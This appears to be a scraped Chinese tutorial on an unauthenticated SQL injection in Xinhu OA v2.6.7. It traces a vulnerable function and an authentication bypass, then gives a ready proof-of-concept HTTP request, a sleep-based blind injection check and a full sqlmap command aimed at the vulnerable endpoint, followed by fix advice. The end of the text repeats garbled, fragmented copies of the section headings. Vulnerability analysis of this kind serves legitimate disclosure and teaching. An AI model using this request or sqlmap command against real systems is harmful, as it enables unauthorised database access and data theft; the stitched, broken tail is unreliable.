信呼OA v2.6.7 SQL注入漏洞分析与利用教学文档<\/h1>

1. 系统介绍<\/h2>
信呼OA是一款企业办公自动化系统，官网地址：http:\/\/www.rockoa.com<\/p>

2. 路由分析<\/h2>

系统采用特定的路由结构：

a<\/code>参数表示方法<\/li>
m<\/code>参数表示目录<\/li>

对于多层目录结构：

d<\/code>是最外层目录<\/li>
m<\/code>由"文件名|目录"组成<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
3. 漏洞点定位<\/h2>
3.1 核心漏洞函数<\/h3>
在savefingerprint<\/code>函数中存在SQL注入漏洞：<\/p>
function<\/span> savefingerprint<\/span>($snid, $uid, $devid=<\/span>''<\/span>)
<\/span><\/span>{
<\/span><\/span>    $where =<\/span> "`snid`='<\/span>$snid<\/span>' and `uid`='<\/span>$uid<\/span>'"<\/span>;
<\/span><\/span>    if<\/span>($devid)$where.=<\/span>" and `devid`='<\/span>$devid<\/span>'"<\/span>;
<\/span><\/span>    $this-><\/span>kquobj<\/span>-><\/span>rows<\/span>($where); \/\/ SQL执行点
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>其中$snid<\/code>和$uid<\/code>参数被直接拼接到SQL语句中。<\/p>
3.2 调用链分析<\/h3>


savefingerprint<\/code>函数被两处调用，其中一处调用可控：<\/p>
if<\/span>($dtype==<\/span>'fingerprint'<\/span>){
<\/span><\/span>    $dstr =<\/span> $arr['value'<\/span>];
<\/span><\/span>    $rs   =<\/span> c<\/span>('check'<\/span>)-><\/span>checkstr<\/span>($dstr);
<\/span><\/span>    $this-><\/span>savefingerprint<\/span>($this-><\/span>snid<\/span>, $rs['ccid'<\/span>]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

调用链追溯：<\/p>

openkqjAction.php<\/code>中的apiAction<\/code>函数调用kqjcmdModel.php<\/code>中的postdata<\/code>函数<\/li>
$this->postdata<\/code>来自openapiAction<\/code>类的getpostdata()<\/code>方法，完全可控<\/li>
<\/ul>
<\/li>
<\/ol>
4. 鉴权分析<\/h2>

正常情况下openapiAction<\/code>类有鉴权机制<\/li>
但openkqjClassAction<\/code>类重写了initAction()<\/code>方法，导致父类鉴权失效<\/li>
重写的方法未实现任何鉴权，导致未授权访问<\/li>
<\/ol>
5. 漏洞利用构造<\/h2>
5.1 请求构造要点<\/h3>


需要满足$act<\/code>值为'post'：<\/p>

系统通过URL路径解析$act<\/code>值<\/li>
例如：\/openkqjClass\/api\/post<\/code><\/li>
<\/ul>
<\/li>

必须参数：<\/p>

sn<\/code>参数必须设置为1（或其他有效值）<\/li>
<\/ul>
<\/li>

POST数据要求：<\/p>

必须为JSON格式<\/li>
需要包含fingerprint<\/code>字段<\/li>
<\/ul>
<\/li>
<\/ol>
5.2 完整POC构造<\/h3>
POST<\/span> \/openkqjClass\/api\/post?sn=1 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "fingerprint"<\/span>: {
<\/span><\/span>        "value"<\/span>: "恶意构造的payload"<\/span>,
<\/span><\/span>        "ccid"<\/span>: "注入payload"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5.3 SQL注入验证<\/h3>

通过MySQL日志监控确认SQL执行<\/li>
时间盲注验证：

构造ccid<\/code>为sleep(5)<\/code>验证延时效果<\/li>
<\/ul>
<\/li>
<\/ol>
6. SQLMap自动化利用<\/h2>
sqlmap -u "http:\/\/target.com\/openkqjClass\/api\/post?sn=1"<\/span> \
<\/span><\/span><\/span><\/span>       --data=<\/span>'{"fingerprint":{"value":"1","ccid":"*"}}'<\/span> \
<\/span><\/span><\/span><\/span>       --headers=<\/span>"Content-Type: application\/json"<\/span> \
<\/span><\/span><\/span><\/span>       --level=<\/span>5<\/span> --risk=<\/span>3<\/span> \
<\/span><\/span><\/span><\/span>       -p "fingerprint.ccid"<\/span>
<\/span><\/span><\/code><\/pre>7. 漏洞修复建议<\/h2>

对所有输入参数进行严格过滤和类型检查<\/li>
使用预处理语句或参数化查询<\/li>
恢复或实现有效的鉴权机制<\/li>
避免直接拼接用户输入到SQL语句中<\/li>
<\/ol>
8. 关键点总结<\/h2>

漏洞类型：未授权SQL注入<\/li>
影响版本：信呼OA v2.6.7<\/li>
注入点：ccid<\/code>参数<\/li>
利用条件：无需认证<\/li>
危害程度：高危，可导致数据库信息泄露<\/li>
<\/ol>
9. 调试技巧<\/h2>

动态调试时可重点关注：

postdata<\/code>函数中的JSON解析<\/li>
savefingerprint<\/code>函数的参数传递<\/li>
<\/ul>
<\/li>
使用MySQL日志监控工具实时查看执行的SQL语句<\/li>
通过var_dump或日志输出关键变量值<\/li>
<\/ol>

信呼OA v2.6.7 SQL注入漏洞分析与利用教学文档<\/h1>

1. 系统介绍<\/h2> 信呼OA是一款企业办公自动化系统，官网地址：http:\/\/www.rockoa.com<\/p>

3. 漏洞点定位<\/h2>

5. 漏洞利用构造<\/h2>

9. 调试技巧<\/h2> 动态调试时可重点关注： postdata<\/code>函数中的JSON解析<\/li> savefingerprint<\/code>函数的参数传递<\/li> <\/ul> <\/li> 使用MySQL日志监控工具实时查看执行的SQL语句<\/li> 通过var_dump或日志输出关键变量值<\/li> <\/ol>

1. 系统介绍<\/h2>
信呼OA是一款企业办公自动化系统，官网地址：http:\/\/www.rockoa.com<\/p>

9. 调试技巧<\/h2>

动态调试时可重点关注：

`postdata<\/code>函数中的JSON解析<\/li>`
`savefingerprint<\/code>函数的参数传递<\/li> <\/ul> <\/li>`
`使用MySQL日志监控工具实时查看执行的SQL语句<\/li>`
`通过var_dump或日志输出关键变量值<\/li> <\/ol>`